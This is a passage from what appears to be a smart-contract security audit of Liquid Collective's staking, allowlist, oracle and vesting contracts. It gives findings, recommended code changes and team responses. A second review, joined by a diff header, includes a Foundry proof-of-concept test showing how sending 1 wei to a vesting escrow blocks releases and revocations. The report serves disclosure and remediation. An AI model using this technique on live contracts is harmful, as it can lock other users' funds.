Description: The modifiers ifGovernor and ifGovernorOrExecutor in Firewall.sol have different naming conventions and logical patterns.

Recommendation: We can rename them, and also modify their logic to follow the rest of the similar modifiers in the codebase:

modifier onlyGovernor() { // <--- ifGovernor
    if (msg.sender != governor) {
        revert Errors.Unauthorized(msg.sender);
    }
    _;
}

modifier onlyGovernorOrExecutor() { // <--- ifGovernorOrExecutor
    if (msg.sender != governor && msg.sender != executor) {
        revert Errors.Unauthorized(msg.sender);
    }
    _;
}

Alluvial: Recommendation implemented in SPEARBIT/30.

Spearbit: Acknowledged.
+6.6.13 OperatorResolution.active might be a redundant struct field which can be removed

Severity: Informational

Context: Operators.sol#L35

Description: The value of active stays true once it has been set to true for a given index. This is especially true since the only call to Operators.set is from OperatorsRegistryV1.addOperator, which does not override values for already registered names.

Recommendation: The updates to this value are almost synced with the updates to Operator.active, except at Operators.setOperatorName (and the unsynced behavior at setOperatorName might be a mistake). So maybe these 2 parameters are meant to be the same. If so, perhaps we should remove the field from either here or from the Operator struct.

Alluvial: This active value is not named properly; it's just here to signal that the index is used. This struct should be replaced by a uint256 that stores index + 1, so we know that if value > 0 then the name is assigned, and we can return value - 1 to retrieve the operator index.

Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14.

Spearbit: Acknowledged.

+6.6.14 Inline the known value of the boolean opExists with its value

Severity: Informational

Context: Operators.sol#L261-L270

Description/Recommendation: In the else branch on Line 269 we know opExists == true. So we can simplify lines 268-269 a bit:

if (!newValue.active) {
    _setOperatorIndex(name, false, index);

Alluvial: Issue does not exist anymore given that the referenced code has been removed in SPEARBIT/14.

Spearbit: Acknowledged.

+6.6.15 The expression for selectedOperatorAvailableKeys in OperatorsRegistry can be simplified

Severity: Informational

Context: OperatorsRegistry.1.sol#L428-L430

Description: operators[selectedOperatorIndex].limit is always less than or equal to operators[selectedOperatorIndex].keys, since every place that sets limit to a value other than 0 checks against going above the keys bound:

OperatorsRegistry.1.sol#L250-L252

if (_newLimits[idx] > operator.keys) {
    revert OperatorLimitTooHigh(_newLimits[idx], operator.keys);
}

OperatorsRegistry.1.sol#L324-L326

if (keyIndex >= operator.keys) {
    revert InvalidIndexOutOfBounds();
}

OperatorsRegistry.1.sol#L344-L346

if (_indexes[_indexes.length - 1] < operator.limit) {
    operator.limit = _indexes[_indexes.length - 1];
}

Recommendation: The usage of the Uint256Lib.min utility function is not necessary, and the value of selectedOperatorAvailableKeys can be computed as:

uint256 selectedOperatorAvailableKeys = (
    operators[selectedOperatorIndex].limit - operators[selectedOperatorIndex].funded
);

Spearbit: It is kind of implemented, although the minimizer/cost function has been modified in SPEARBIT/3.

+6.6.16 The unused constant DELTA_BASE can be removed

Severity: Informational

Context: BeaconReportBounds.sol#L11

Description: The constant DELTA_BASE in BeaconReportBounds is never used.

Recommendation: If you are not planning to use it, it would be best to remove it from the codebase.

Alluvial: Recommendation implemented in SPEARBIT/30. Note: we changed the name of BeaconReportBounds to ReportBounds.

Spearbit: Acknowledged.
+6.6.17 Remove unused modifiers

Severity: Informational

Context: OperatorsRegistry.1.sol#L115

Description: The modifier active(uint256 _index) is not used in the project.

Recommendation: If you are not planning to use this modifier, consider removing it from the codebase.

Alluvial: Recommendation implemented in SPEARBIT/30.

Spearbit: Acknowledged.

+6.6.18 Modifier names do not follow the same naming patterns

Severity: Informational

Context: OperatorsRegistry.1.sol#L45, OperatorsRegistry.1.sol#L62

Description: The modifier names do not follow the same naming patterns in OperatorsRegistry.

Recommendation: Consider renaming the following modifiers:

modifier operatorFeeRecipientOrAdmin(uint256 _index)
modifier operatorOrAdmin(uint256 _index)

To be consistent with other modifier names, it might be best to rename operatorFeeRecipientOrAdmin to onlyActiveOperatorFeeRecipientOrAdmin (and its input could be called _operatorIndex). And we can rename operatorOrAdmin to onlyActiveOperatorOrAdmin (and its input could be called _operatorIndex).

Alluvial: Recommendation implemented in SPEARBIT/30.

Spearbit: Acknowledged.

+6.6.19 In AllowlistV1.allow the input variable _statuses can be renamed to better represent the values it holds

Severity: Informational

Context: Allowlist.1.sol#L49

Description: In AllowlistV1.allow, the input variable _statuses can be renamed to better represent the values it holds. _statuses is a bitmap where each bit represents a particular action that a user can take.

Recommendation: Rename _statuses to better represent what it is used for. Basically, each status here represents 256 permission roles. Maybe rename it to _userPermissions to relate to the use cases in the other functions in AllowlistV1.

Alluvial: Changed _statuses to _permissions in SPEARBIT/30.

Spearbit: Acknowledged.

+6.6.20 riverAddress can be renamed to river and we can avoid extra interface casting

Severity: Informational

Context: Oracle.1.sol#L468-L471, Oracle.1.sol#L479

Description: riverAddress's name suggests that it is only an address, although it is an address with the IRiverV1 interface attached to it. Also, we can avoid unnecessary casting of interfaces.

Recommendation: riverAddress can be renamed to river, since it's not just an address as the name suggests. Also, the extra interface castings can be removed.

IRiverV1 river = IRiverV1(payable(RiverAddress.get()));
uint256 prevTotalEth = river.totalUnderlyingSupply();
river.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId));
uint256 postTotalEth = river.totalUnderlyingSupply();
...
emit PostTotalShares(
    postTotalEth,
    prevTotalEth,
    timeElapsed,
    river.totalSupply()
);

Alluvial: Recommendation implemented in SPEARBIT/30.

Spearbit: Acknowledged.
+6.6.21 Define named constants for numeric literals

Severity: Informational

Context: Oracle.1.sol#L436, Oracle.1.sol#L447

Description: In _sanityChecks, 2 numeric literals, 10000 and 365 days, are used:

uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth)
...
if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) {

Recommendation: It would be best to define named constants and replace the literals with them.

Alluvial: Recommendation implemented in SPEARBIT/19.

Spearbit: Acknowledged.

+6.6.22 Move the memberIndex and ReportsPositions checks to the beginning of the OracleV1.reportBeacon function

Severity: Informational

Context: Oracle.1.sol#L289, Oracle.1.sol#L307-L313

Description: The checks for memberIndex == -1 and ReportsPositions.get(uint256(memberIndex)) happen in the middle of reportBeacon, after quite a few calculations have been done.

Recommendation: Move these checks to the beginning of the function so it reverts early whenever it would have to revert because of these 2 checks.

function reportBeacon(uint256 _epochId, uint64 _beaconBalance, uint32 _beaconValidators) external {
    int256 memberIndex = OracleMembers.indexOf(msg.sender);
    if (memberIndex == -1) {
        revert Errors.Unauthorized(msg.sender);
    }
    ...
    if (ReportsPositions.get(uint256(memberIndex))) {
        revert AlreadyReported(_epochId, msg.sender);
    }
    ...

Alluvial: Recommendation implemented in SPEARBIT/20.

Spearbit: Acknowledged.

+6.6.23 Document what incentivizes the operators to run their validators when globalFee is zero

Severity: Informational

Context: River.1.sol#L270

Description: If GlobalFee can be 0, then neither the treasury nor the operators earn rewards. What factor would motivate the operators to keep their validators running?

Recommendation: It would be best to document whether there are other incentives for the operators to keep their validators running when globalFee is zero.

Alluvial: Acknowledged.

+6.6.24 Document how Alluvial plans to prevent institutional investors and operators from getting into business directly and bypassing the River protocol

Severity: Informational

Description: Since the lists of operators and depositors can be looked up from the on-chain information, what would prevent institutional investors (users) and the operators from doing business outside of River? Is there going to be an off-chain legal contract between Alluvial and these other entities to prevent this scenario?

Recommendation: Document how Alluvial plans to prevent institutional investors and operators from getting into business directly and bypassing the River protocol.

Alluvial: Acknowledged.

+6.6.25 Document how operator rewards will be distributed if OperatorRewardsShare is zero

Severity: Informational

Context: River.1.sol#L275

Description: If OperatorRewardsShare can be 0, then the operators won't earn rewards. What factor would motivate the operators to keep their validators running? Side note: other incentives for the operators to keep their validators running (if their reward share portion is 0) would be some sort of MEV or block proposal/attestation bribes. Related: "Avoid wasting gas distributing rewards when the number of shares to be distributed is zero" (6.5.18).

Recommendation: It would be best to document this issue for the operators so they would know how they can access the rewards.

Alluvial: The whole operator rewarding system has been removed in SPEARBIT/8. The revenue redistribution will be computed off-chain and will be detailed in the documentation PR.

Spearbit: Acknowledged.
The TRANSFER_MASK is also used in _onDeposit: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_depositor, DEPOSIT_MASK + TRANSFER_MASK); // DEPOSIT_MASK + TRANSFER_MASK == DEPOSIT_MASK IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_recipient, TRANSFER_MASK); // like above in `_onTransfer` Recommendation: At first, we thought TRANSFER_MASK was not assigned the correct bitmask value, so we recommended setting those values correctly. But after discussing with the Alluvial team, it became clear that they are not planning to use this parameter currently, and that is why it is assigned a no-op type of value. Alluvial: They have been asked to leave it so they can change its value if they ever need that feature (imo won't ever happen else the project becomes unusable) Spearbit: If TRANSFER_MASK is not being used, it would be best to remove it from the project, including all the code that relies on it. Right now, the only thing that it does is a no-op. Also, if its value ever needed to be changed, the whole contract would need to be redeployed (since it's a constant). So in this case, I would change the above lines in _onTransfer to: IAllowlistV1 allowList = IAllowlistV1(AllowlistAddress.get()); if( allowList.isDenied(_from) ) { // Denied custom error needs to be imported or created or // we can create a new function for IAllowlist called `onlyNotDenied` to // replace this whole `if` block revert Denied(_from); } if( allowList.isDenied(_to) ) { revert Denied(_to); } and in _onDeposit to: IAllowlistV1 allowList = IAllowlistV1(AllowlistAddress.get()); allowList.onlyAllowed(_depositor, DEPOSIT_MASK); if( allowList.isDenied(_recipient) ) { revert Denied(_recipient); } Alluvial: Recommendation implemented in SPEARBIT/21. Spearbit: Acknowledged.
+6.6.28 Reformat numeric literals with many digits for better readability. Severity: Informational Context: River.1.sol#L35, Oracle.1.sol#L436, Oracle.1.sol#L447, ConsensusLayerDepositManager.1.sol#L107 Description: Reformat numeric literals with many digits into a more readable form. Recommendation: Use _ or scientific notation to either partition the digits or shorten the form. River.1.sol#L35: - uint256 public constant BASE = 100000; + uint256 public constant BASE = 100_000; // or 1e5 Oracle.1.sol#L436, Oracle.1.sol#L447: - 10000 + 100_00 // or 1e4 ConsensusLayerDepositManager.1.sol#L107: - uint256 depositAmount = value / 1000000000 wei; + uint256 depositAmount = value / 1 gwei; // or 1e9 wei or 1_000_000_000 wei Alluvial: Recommendation implemented in SPEARBIT/19. Spearbit: Acknowledged.
+6.6.29 Firewall should follow the two-step approach present in River when transferring the governor address Severity: Informational Context: Firewall.sol#L59-L61 Description: Both River and OperatorsRegistry follow a two-step approach to transfer the ownership of the contract: 1) Propose a new owner, storing the address in a pendingAdmin variable. 2) The pending admin accepts the new role by actively calling acceptOwnership. This approach makes this crucial action much safer because it: 1) Prevents the admin from transferring ownership to address(0), given that address(0) cannot call acceptOwnership. 2) Prevents the admin from transferring ownership to an address that cannot "admin" the contract if it cannot call acceptOwnership, for example a contract that does not have an implementation able to at least call acceptOwnership.
3) Allows the current admin to stop the process by calling transferOwnership(address(0)) if the pending admin has not called acceptOwnership yet. The current implementation does not follow this safe approach, allowing the governor to directly transfer the governor role to a new address. Recommendation: Consider implementing a two-step transfer of the governor role, similar to the one implemented in the River and OperatorsRegistry contracts. Alluvial: Recommendation implemented in SPEARBIT/11. Spearbit: Note (1): still missing (client said it will be implemented in other PRs): • Administrable is missing all natspec comments. • Events for _setAdmin are still missing but will be added to the Initializable event in another PR. Note (2): the client has acknowledged that all the contracts that inherit from Administrable have the ability to transfer ownership, even contracts like AllowlistV1 that didn't have the ability before this PR. Alluvial: Issues in Note 1 addressed in SPEARBIT/33. Spearbit: Acknowledged.
+6.6.30 OperatorRegistry.removeValidators is resetting the limit (approved validators) even when not needed Severity: Informational Context: OperatorsRegistry.1.sol#L304-L347 Description: The current implementation of removeValidators allows an admin or node operator to remove validators, passing to the function the list of validator indexes to be removed. Note that the list of indexes must be ordered DESC. At the end of the function, we can see this check: if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; } It resets the operator's limit to the lowest removed index (this prevents a not-yet-approved key from getting swapped to a position inside the limit). The issue with this implementation is that it does not consider the case where all the operator's validators are already approved by Alluvial. In this case, if an operator removes the validator with the lowest index, all the other validators get de-approved because the limit will be set to that lowest index. Consider this scenario: op.limit = 10 op.keys = 10 op.funded = 0 This means that all the validators added by the operator have been approved by Alluvial and are safe (keys == limit). If the operator or Alluvial calls removeValidators([validatorIndex], [0]), removing the validator at index 0, this will: • swap validator_10 with validator_0. • set the limit to 0 because 0 < 10 (_indexes[_indexes.length - 1] < operator.limit). The consequence is that even if all the validators present before calling removeValidators were "safe" (because they were approved by Alluvial), the limit is now 0, meaning that all the validators are not "safe" anymore and cannot be selected by pickNextValidators. Recommendation: Consider updating the logic of removeValidators to handle this edge case. Alluvial: Recommendation implemented in SPEARBIT/22. Spearbit: Acknowledged.
+6.6.31 Consider renaming transferOwnership to better reflect the function's logic Severity: Informational Context: River.1.sol#L142-L146, OperatorsRegistry.1.sol#L88-L92 Description: The current implementation of transferOwnership does not actually transfer the ownership from the current admin to the new one. The function sets the value of the pending admin, who must subsequently call acceptOwnership to accept the role and confirm the transfer of the ownership. Recommendation: Consider renaming the transferOwnership function to something that better reflects the function's logic. Alluvial: Recommendation implemented in SPEARBIT/11. Spearbit: Acknowledged.
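To make the propose/accept flow from the two findings above (6.6.29 and 6.6.31) concrete, here is a minimal sketch; the contract and function names are illustrative, not the actual River/OperatorsRegistry code:

pragma solidity 0.8.10;

// Minimal sketch of a two-step admin transfer; illustrative names only.
contract TwoStepAdmin {
    address public admin;
    address public pendingAdmin;

    error Unauthorized(address caller);

    constructor() {
        admin = msg.sender;
    }

    // Step 1: the current admin proposes a new admin; proposing address(0) cancels the pending proposal.
    function proposeAdmin(address _newAdmin) external {
        if (msg.sender != admin) revert Unauthorized(msg.sender);
        pendingAdmin = _newAdmin;
    }

    // Step 2: the proposed admin must actively accept, proving it is able to operate the contract.
    function acceptAdmin() external {
        if (msg.sender != pendingAdmin) revert Unauthorized(msg.sender);
        admin = pendingAdmin;
        pendingAdmin = address(0);
    }
}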
+6.6.32 Wrong return name used Severity: Informational Context: Uint256Lib.sol#L20 Description: The min function returns the minimum of the 2 inputs, but the return name used is max. Recommendation: Rename or remove the return variable name. -function min(uint256 a, uint256 b) internal pure returns (uint256 max) { +function min(uint256 a, uint256 b) internal pure returns (uint256) { Alluvial: Recommendation implemented in SPEARBIT/30. Spearbit: Acknowledged.
+6.6.33 Discrepancy between architecture and code Severity: Informational Context: ConsensusLayerDepositManager.1.sol#L50 Description: The architecture diagram states that the admin triggers deposits on the Consensus Layer Deposit Manager, but the depositToConsensusLayer() function allows anyone to trigger such deposits. Recommendation: Implement the necessary changes to reflect the intended functionality. Alluvial: The depositToConsensusLayer() function is now protected by the onlyAdmin-CDMV1 modifier in SPEARBIT/27. Spearbit: Acknowledged.
+6.6.34 Consider replacing the remaining require with custom errors Severity: Informational Context: ConsensusLayerDepositManager.1.sol#L129, BytesLib.sol#L94, BytesLib.sol#L95 Description: The vast majority of the project's contracts define and already use custom errors, which provide better UX, DX, and gas savings compared to require statements. There are still some instances of require usage in the ConsensusLayerDepositManager and BytesLib contracts that could be replaced with custom errors. Recommendation: Consider replacing the remaining require statements with custom errors to follow the best practice already adopted by the project. Alluvial: Recommendation implemented in SPEARBIT/23. Spearbit: Acknowledged.
+6.6.35 Both the wlsETH and lsETH transferFrom implementations allow the owner of the token to use transferFrom as if it were a "normal" transfer Severity: Informational Context: WLSETH.1.sol#L103-L109, SharesManager.1.sol#L129-L135 Description: The current implementation of transferFrom allows the msg.sender to use the function as if it were a "normal" transfer. In this case, the allowance is checked only if the msg.sender is not equal to _from: if (_from != msg.sender) { uint256 currentAllowance = ApprovalsPerOwner.get(_from, msg.sender); if (currentAllowance < _value) { revert AllowanceTooLow(_from, msg.sender, currentAllowance, _value); } ApprovalsPerOwner.set(_from, msg.sender, currentAllowance - _value); } This implementation diverges from what is usually implemented in both Solmate and OpenZeppelin. Recommendation: For clarity, remove the check and allow the msg.sender to transfer tokens from their own balance only via the transfer function. Removing the check would also make the function cost less gas. Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged.
+6.6.36 Both the wlsETH and lsETH tokens are reducing the allowance when the allowed amount is type(uint256).max Severity: Informational Context: WLSETH.1.sol#L103-L109, SharesManager.1.sol#L129-L135 Description: The current implementation of the transferFrom function in both SharesManager.1.sol and WLSETH.1.sol does not take into consideration the scenario where a user has approved a spender the maximum possible allowance, type(uint256).max. The Alluvial transferFrom acts differently from standard ERC20 implementations like the ones from Solmate and OpenZeppelin, which check and reduce the spender's allowance if and only if the allowance is different from type(uint256).max.
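For reference, here is a minimal sketch of that standard pattern (simplified and illustrative; not the Solmate or OpenZeppelin source, and not the lsETH/wlsETH code):

pragma solidity 0.8.10;

// Sketch of the standard infinite-allowance behavior: an allowance of
// type(uint256).max is treated as infinite and is never reduced.
contract AllowanceSketch {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    function transferFrom(address _from, address _to, uint256 _value) external returns (bool) {
        uint256 currentAllowance = allowance[_from][msg.sender];
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= _value, "allowance too low");
            allowance[_from][msg.sender] = currentAllowance - _value;
        }
        balanceOf[_from] -= _value; // reverts on underflow in Solidity >= 0.8
        balanceOf[_to] += _value;
        return true;
    }
}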
Recommendation: Consider following the standard ERC20 implementation from Solmate or OpenZeppelin to avoid reducing an allowance that has been set to infinite (type(uint256).max). Alluvial: Recommendation implemented in SPEARBIT/9. Spearbit: Acknowledged.
+6.6.37 Missing, confusing or wrong natspec comments Severity: Informational Context: • Allowlist.1.sol • Firewall.sol • Initializable.sol • OperatorsRegistry.1.sol • Oracle.1.sol • River.1.sol • TUPProxy.sol • WLSETH.1.sol • Withdraw.1.sol • ConsensusLayerDepositManager.1.sol • OracleManager.1.sol • SharesManager.1.sol • UserDepositManager.1.sol • all interfaces inside the interfaces folder (consider the usage of @inheritdoc) • BytesLib.sol • Errors.sol • LibOwnable.sol • Uint256Lib.sol • UnstructuredStorage.sol • all the contracts/libraries inside the state folder Description: In the current implementation, not all the constructors, functions, events, custom errors, variables, or structs are covered by natspec comments. Some of them are only partially covered (missing @param, @return, and so on). Note that the contracts listed in the context section of this issue have completely or partially missing natspec.
• Natspec fixes / typos: River.1.sol#L38-L39: swap the empty line with the natspec @notice.
- /// @notice Prevents unauthorized calls
-
+
+ /// @notice Prevents unauthorized calls
OperatorsRegistry.1.sol#L44, OperatorsRegistry.1.sol#L61, OperatorsRegistry.1.sol#L114: replace name with index.
- /// @param _index The name identifying the operator
+ /// @param _index The index identifying the operator
OperatorsRegistry.1.sol#L218: replace cound with count.
- /// @notice Changes the operator stopped validator cound
+ /// @notice Changes the operator stopped validator count
• Expand the natspec explanation: we also suggest expanding the explanation of some functions' logic inside the natspec. OperatorsRegistry.1.sol#L355-L358: expand the natspec documentation and add a @return natspec comment clarifying that the returned value is the total number of operators and not the active/fundable ones. ReportsVariants.sol#L5: add a comment that explains the COUNT_OUTMASK's assignment. This will mask beaconValidators and beaconBalance in the designed packing: xx...xx xxxx & COUNT_OUTMASK == 00...00 0000. ReportsVariants.sol should have documentation regarding the packing used for ReportsVariants in a uint256:
[ 0,  16) : oracle member's total vote count for the numbers below (uint16, 2 bytes)
[16,  48) : total number of beacon validators (uint32, 4 bytes)
[48, 112) : total balance of all the beacon validators (uint64, 8 bytes)
OracleMembers.sol: leave a comment/warning that there can only be a maximum of 256 oracle members. This is due to the ReportsPositions setup, where in a uint256, 1 bit is reserved for each oracle member's index. ReportsPositions.sol: leave a comment/warning for the ReportsPositions setup that the ith bit in the uint256 represents whether or not there has been a beacon report by the ith oracle member. Oracle.1.sol#L202-L205: leave a comment/warning that there can only be a maximum of 256 oracle members. This is due to the ReportsPositions setup, where in a uint256, 1 bit is reserved for each oracle member's index. Allowlist.1.sol#L46-L49: leave a comment warning that the permission bitmaps will be overwritten instead of being updated.
OracleManager.1.sol#L44: add more comments for _roundId to mention that setBeaconData is called by Oracle.1.sol:_pushToRiver and that the value passed to it for this parameter is always the 1st epoch of a frame. OperatorsRegistry.1.sol#L304-L310: document the _indexes parameter, mentioning that this array: 1) needs to be duplicate-free and sorted (DESC), and 2) each element in the array needs to be in a specific range, namely operator.[funded, keys). OperatorsRegistry.1.sol#L60-L62: rephrase the natspec comment to avoid further confusion. Oracle.1.sol#L284-L289: update the reportBeacon natspec documentation about the _beaconValidators parameter to avoid further confusion. Client answer to the PR comment: The docs should be updated to also reflect our plans for the Shanghai fork. Basically we can't just have the same behavior for a negative delta in validator count as with a positive delta (where we just assume that each validator that was in the queue only had 32 eth). Now when we exit validators we need to know how much was exited in order to compute the proper revenue value for the treasury and operator fee. This probably means that there will be an extra arg with the oracle to keep track of the exited eth value. But as long as the spec is not final, we'll stick to the validator count always growing. We should definitely add a custom error to explain that in case a report provides a smaller validator count. Recommendation: Consider adding the missing natspec to the suggested constructors, functions, events, custom errors, variables, and structs. Alluvial: Addressed in [SPEARBIT/33] Documentation and natspec. Spearbit: Acknowledged.
+6.6.38 Remove unused imports from code Severity: Informational Context: ELFeeRecipient.1.sol#L6, Oracle.1.sol#L9 Description: There are unused imports across the codebase. If they are not used inside the contract, it would be better to remove them to avoid confusion. Recommendation: Remove imports not used by the contracts. Alluvial: Recommendation implemented in SPEARBIT/32. Spearbit: Acknowledged.
+6.6.39 Missing event emission in critical functions, init functions and setters Severity: Informational Context: • Allowlist.1.sol#L22 • Allowlist.1.sol#L37 • OperatorsRegistry.1.sol#L23 • OperatorsRegistry.1.sol#L84 • OperatorsRegistry.1.sol#L90 • OperatorsRegistry.1.sol#L95 • ELFeeRecipient.1.sol#L18 • Firewall.sol#L25-L30 • Firewall.sol#L59 • Firewall.sol#L64 • Firewall.sol#L69 • Oracle.1.sol#L53-L62 • Oracle.1.sol#L205 • Oracle.1.sol#L216 • Oracle.1.sol#L230 • Oracle.1.sol#L248 • River.1.sol#L57-L68 • River.1.sol#L92 • River.1.sol#L107 • River.1.sol#L122 • River.1.sol#L133 • River.1.sol#L144 • River.1.sol#L149 • River.1.sol#L169 • TUPProxy.sol#L27 • TUPProxy.sol#L32 • WLSETH.1.sol#L43 • WLSETH.1.sol#L129 • WLSETH.1.sol#L140 • OracleManager.1.sol#L77 Description: Some critical functions, like a contract's constructor, a contract's init*(...) function (upgradable contracts), and some setters or other critical functions, are missing event emissions. Event emissions are very useful for external web3 applications, but also for monitoring the usage and security of your protocol when paired with external monitoring tools. Note: in the init*(...)/constructor function, consider whether to add a general broad event like ContractInitialized or to split it into more specific events like QuorumUpdated + OwnerChanged + ... Note: in general, consider adding an event emission to all the init*(...)
functions used to initialize the upgradable contracts, passing to the event the relevant args in addition to the version of the upgrade. Recommendation: Consider adding event emissions to the contracts that are lacking them. Alluvial: Recommendation implemented in SPEARBIT/31. Spearbit: Acknowledged.
7 Appendix
7.1 diff --git a/findings_newupdate/spearbit/LiquidCollective2-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LiquidCollective2-Spearbit-Security-Review.txt new file mode 100644 index 0000000..6bbf190 --- /dev/null +++ b/findings_newupdate/spearbit/LiquidCollective2-Spearbit-Security-Review.txt @@ -0,0 +1,31 @@
+7.1.1 A malicious user could DOS a vesting schedule by sending only 1 wei of TLC to the vesting escrow address Severity: Critical Risk Context: • ERC20VestableVotesUpgradeable.1.sol#L132-L134 • ERC20VestableVotesUpgradeable.1.sol#L137-L139 • ERC20VestableVotesUpgradeable.1.sol#L86-L97 • ERC20VestableVotesUpgradeable.1.sol#L353 Description: An external user who owns some TLC tokens could DOS the vesting schedule of any user by sending just 1 wei of TLC to the escrow address related to the vesting schedule. By doing that: • The creator of the vesting schedule will not be able to revoke the vesting schedule. • The beneficiary of the vesting schedule will not be able to release any vested tokens until the end of the vesting schedule. • Any external contracts or dApps will not be able to call computeVestingReleasableAmount. In practice, all the functions that internally call _computeVestingReleasableAmount will revert because of an underflow error when called before the vesting schedule ends. The underflow error is thrown because, when called before the schedule ends, _computeVestingReleasableAmount will enter the if (_time < _vestingSchedule.end) branch and will try to compute uint256 releasedAmount = _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) - balanceOf(_escrow); In this case, _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) will always be lower than balanceOf(_escrow) and the contract will revert with an underflow error. When the vesting period ends, the contract will not enter the if (_time < _vestingSchedule.end) branch and the user will be able to gain the whole vested amount plus the extra amount of TLC sent to the escrow account by the malicious user. Scenario: 1) Bob owns 1 TLC token. 2) Alluvial creates a vesting schedule for Alice like the following example: createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); 3) Bob sends 1 TLC token to the escrow account of Alice's vesting schedule. 4) After the cliff period, Alice should be able to release 1 TLC token. Because balanceOf(_escrow) is now 11, the computation will underflow, as _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) returns 10.
Find below a test case showing all three different DOS scenarios: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import "forge-std/Test.sol"; import "../src/TLC.1.sol"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr("init"); bob = makeAddr("bob"); alice = makeAddr("alice"); carl = makeAddr("carl"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDOSReleaseVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob sends one token directly to the escrow contract of Alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // Cliff period has passed and Alice tries to get the first batch of the vested tokens vm.warp(block.timestamp + 1 days); vm.prank(alice); // The transaction will revert with an underflow because the balance of the escrow has been increased externally vm.expectRevert(stdError.arithmeticError); tlc.releaseVestingSchedule(0); // Warp to the vesting schedule period end vm.warp(block.timestamp + 9 days); // Alice is able to get the whole vesting schedule amount // plus the token sent by the attacker to the escrow contract vm.prank(alice); tlc.releaseVestingSchedule(0); assertEq(tlc.balanceOf(alice), 11); } function testDOSRevokeVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob sends one token directly to the escrow contract of Alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // The creator decides to revoke the vesting schedule before the end timestamp // It will throw an underflow error vm.prank(initAccount); vm.expectRevert(stdError.arithmeticError); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 1)); } function testDOSComputeVestingReleasableAmount() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob sends one token directly to the escrow contract of Alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); vm.expectRevert(stdError.arithmeticError); uint256 releasableAmount = tlc.computeVestingReleasableAmount(0); // Warp to the end of the vesting schedule vm.warp(block.timestamp + 10 days); releasableAmount = tlc.computeVestingReleasableAmount(0); assertEq(releasableAmount,
11); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } } Recommendation: Consider re-implementing how the contract accounts for the amount of released tokens of a vesting schedule to avoid this situation. In case the new implementation no longer relies on balanceOf(_escrow), remember that tokens sent directly to the escrow account would be stuck forever. Alluvial: Fixed in liquid-collective/liquid-collective-protocol@7870787 by introducing a new variable inside the user vesting schedule named releasedAmount that tracks the already released amount and cannot be manipulated by an external attacker. Spearbit: Fixed.
7.2 Medium Risk
+7.2.1 Coverage funds might be pulled not only for the purpose of covering slashing losses Severity: Medium Risk Context: OracleManager.1.sol#L108-L113 Description: The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events. Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable. In practice, however, it is possible that these funds will be pulled not only in emergency events. _maxIncrease is used as a measure to enforce the maximum difference between prevTotalEth and postTotalEth, but in practice, it is being used as a mandatory growth factor in the context of coverage funds, which might cause the pulling of funds from the coverage fund to ensure _maxIncrease of revenue in case fees are not high enough. Recommendation: Consider replacing if (((_maxIncrease + previousValidatorTotalBalance) - executionLayerFees) > _validatorTotalBalance) { coverageFunds = _pullCoverageFunds( ((_maxIncrease + previousValidatorTotalBalance) - executionLayerFees) - _validatorTotalBalance ); } with if (previousValidatorTotalBalance > _validatorTotalBalance + executionLayerFees) { coverageFunds = _pullCoverageFunds( ((_maxIncrease + previousValidatorTotalBalance) - executionLayerFees) - _validatorTotalBalance ); } Alluvial: Trying to clarify the use-case and the sequence of operations here: • Use case: Liquid Collective partners with Nexus Mutual 